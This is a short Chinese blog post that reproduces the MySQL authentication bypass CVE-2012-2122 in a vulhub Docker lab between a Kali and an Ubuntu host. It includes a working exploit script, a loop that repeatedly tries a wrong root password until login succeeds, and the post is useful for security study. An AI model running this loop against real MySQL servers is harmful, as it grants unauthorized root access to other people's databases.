|
收藏闪存小组博问

请去看诡秘之主

园龄:3年5个月粉丝:12关注:10

Mysql 身份认证绕过漏洞(CVE-2012-2122)

参考文章:http://t.csdn.cn/CJuGe

搭建环境

https://vulhub.org/#/environments/mysql/CVE-2012-2122/

主机准备

准备两台主机,
一台ubuntu(192.168.12.137),一台kail,均处于同一内网环境下。
其中kail作为攻击主机,ubuntu作为受害主机。

环境搭建

进入目录环境
image
执行如下命令:

docker-compose up -d

image
环境启动成功

尝试攻击

先使用正确的密码登录看看是否成功启动环境
在kail主机的命令行输入命令

mysql -h 192.168.12.137 -u root -p123456 -P3306

image

写如下shell脚本,并执行。
payload.sh

for i in `seq 1 1000`; do mysql -uroot -pwrong -h 192.168.12.137 -P3306 ; done

命令行执行

bash payload.sh

image
利用成功

本文作者:请去看诡秘之主

本文链接:https://www.cnblogs.com/xjy881/p/16809817.html

版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。

posted @   请去看诡秘之主  阅读(230)  评论(0编辑  收藏  举报
历史上的今天:
2021-10-20 实验一 类与对象
点击右上角即可分享
微信分享提示
AI IDE Trae
评论
收藏
关注
推荐
深色
回顶
收起